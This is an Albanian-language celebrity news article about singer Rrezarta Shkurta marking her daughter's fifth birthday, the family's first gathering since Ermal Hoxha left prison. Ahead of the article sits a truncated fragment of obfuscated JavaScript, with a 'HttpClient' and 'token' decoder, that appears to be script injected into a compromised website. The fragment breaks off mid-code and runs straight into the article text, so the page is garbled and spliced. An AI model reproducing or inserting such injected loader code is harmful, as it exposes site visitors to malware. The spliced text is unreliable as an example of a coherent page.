;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Një festë magjike pasi familja u bashkua, Rrezarta Shkurta organizon ahengun për ditëlindjen e vajzës

By

Të martën, vajza e vetme e Rrezarta Shkurtës dhe Ermal Hoxhës festoi 5-vjetorin e lindjes së saj. Nëpërmjet një kolazhi me foto në Instastory, këngëtarja bëri një urim të ëmbël për të bijën, të cilin e ndau me të gjithë me plot lumturi dhe entuziazëm.

“Nuk do të doja asgjë më shumë në 5-vjetorin tënd të lindjes. Faleminderit princeshë e vockël që zgjodhe të jemi prindërit e tu. Do mundohemi me të gjitha forcat tona të të bëjmë më të lumturën në botë dhe mos të të zhgënjejmë asnjëherë. Të duam në infinit mami dhe babi”, shkroi Rrezarta në Instagramin e saj.

Ndërsa mbrëmjen e kaluar, Familja Hoxha e Shkurta, kanë festuar ditëlindjen e Herës dhe nëpërmjet fotove dhe videove, Rrezarta ndau me të gjithë ndjekësit momente të lumtura nga festa në shtëpi.

Kjo është edhe hera e parë që familja mblidhet pas lirimit të Ermalit nga burgu, ndërsa në pamjet e publikuara, familjarët shfaqen rreth tryezës teksa darkojnë, ndërkohë që ambientin e kanë zbukuruar me drita e lule të shumta, tamam një festë magjike ditëlindjeje për një vogëlushe.

Artikuj të ngjashëm